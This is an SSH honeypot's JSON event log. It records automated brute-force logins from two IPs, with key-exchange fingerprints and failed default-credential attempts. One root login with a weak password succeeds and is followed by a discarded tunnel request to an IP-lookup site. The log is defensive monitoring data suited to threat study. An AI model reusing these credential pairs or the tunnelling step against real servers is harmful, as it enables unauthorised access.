{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:36.025640Z","src_ip":"212.227.235.229","session":"eb6082742a1b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:38.471189Z","src_ip":"212.227.235.229","session":"eb6082742a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37492,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7d42e42ae11","protocol":"ssh","message":"New connection: 212.227.235.229:37492 (1.2.3.4:22) [session: a7d42e42ae11]","sensor":"my-vps","timestamp":"2025-08-31T04:44:39.803597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:39.804255Z","src_ip":"212.227.235.229","session":"a7d42e42ae11"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:40.157033Z","src_ip":"212.227.235.229","session":"eb6082742a1b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:40.288683Z","src_ip":"212.227.235.229","session":"a7d42e42ae11"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:42.699066Z","src_ip":"212.227.235.229","session":"a7d42e42ae11"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:44.084112Z","src_ip":"212.227.235.229","session":"a7d42e42ae11"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:45.806284Z","src_ip":"212.227.125.160","session":"ddba7b4a82e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37502,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf6d4beefbd","protocol":"ssh","message":"New connection: 212.227.235.229:37502 (1.2.3.4:22) [session: 6cf6d4beefbd]","sensor":"my-vps","timestamp":"2025-08-31T04:44:46.379312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:46.380481Z","src_ip":"212.227.235.229","session":"6cf6d4beefbd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:46.640809Z","src_ip":"212.227.235.229","session":"6cf6d4beefbd"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:47.771176Z","src_ip":"212.227.235.229","session":"6cf6d4beefbd"}
{"eventid":"cowrie.session.closed","duration":"19.3","message":"Connection lost after 19.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:48.852335Z","src_ip":"212.227.125.160","session":"ddba7b4a82e2"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:49.513484Z","src_ip":"212.227.235.229","session":"6cf6d4beefbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33526,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a42566238e3","protocol":"ssh","message":"New connection: 212.227.125.160:33526 (1.2.3.4:22) [session: 1a42566238e3]","sensor":"my-vps","timestamp":"2025-08-31T04:44:50.707430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:50.713529Z","src_ip":"212.227.125.160","session":"1a42566238e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:50.895073Z","src_ip":"212.227.125.160","session":"1a42566238e3"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:51.644498Z","src_ip":"212.227.125.160","session":"1a42566238e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33500,"dst_ip":"1.2.3.4","dst_port":22,"session":"3179143a4c1b","protocol":"ssh","message":"New connection: 212.227.235.229:33500 (1.2.3.4:22) [session: 3179143a4c1b]","sensor":"my-vps","timestamp":"2025-08-31T04:44:52.750825Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:52.834781Z","src_ip":"212.227.125.160","session":"1a42566238e3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:53.264118Z","src_ip":"212.227.235.229","session":"3179143a4c1b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:53.269839Z","src_ip":"212.227.235.229","session":"3179143a4c1b"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:57.630951Z","src_ip":"212.227.235.229","session":"3179143a4c1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43770,"dst_ip":"1.2.3.4","dst_port":22,"session":"5381ed0b3347","protocol":"ssh","message":"New connection: 212.227.235.229:43770 (1.2.3.4:22) [session: 5381ed0b3347]","sensor":"my-vps","timestamp":"2025-08-31T04:45:00.207346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:00.209198Z","src_ip":"212.227.235.229","session":"5381ed0b3347"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:00.561363Z","src_ip":"212.227.235.229","session":"5381ed0b3347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38180,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b5ac7730232","protocol":"ssh","message":"New connection: 212.227.235.229:38180 (1.2.3.4:22) [session: 8b5ac7730232]","sensor":"my-vps","timestamp":"2025-08-31T04:45:00.591017Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:00.721913Z","src_ip":"212.227.235.229","session":"3179143a4c1b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:01.350388Z","src_ip":"212.227.235.229","session":"8b5ac7730232"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:45:01.351625Z","src_ip":"212.227.235.229","session":"8b5ac7730232"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:45:01.943715Z","src_ip":"212.227.235.229","session":"5381ed0b3347"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:45:02.201910Z","session":"5381ed0b3347"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:45:02.532254Z","src_ip":"212.227.235.229","session":"5381ed0b3347"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:02.917597Z","src_ip":"212.227.235.229","session":"5381ed0b3347"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password1","message":"login attempt [postgres/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:07.433871Z","src_ip":"212.227.235.229","session":"8b5ac7730232"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:09.227956Z","src_ip":"212.227.235.229","session":"8b5ac7730232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44688,"dst_ip":"1.2.3.4","dst_port":22,"session":"59b925ae8680","protocol":"ssh","message":"New connection: 212.227.235.229:44688 (1.2.3.4:22) [session: 59b925ae8680]","sensor":"my-vps","timestamp":"2025-08-31T04:45:10.288369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:10.291300Z","src_ip":"212.227.235.229","session":"59b925ae8680"}
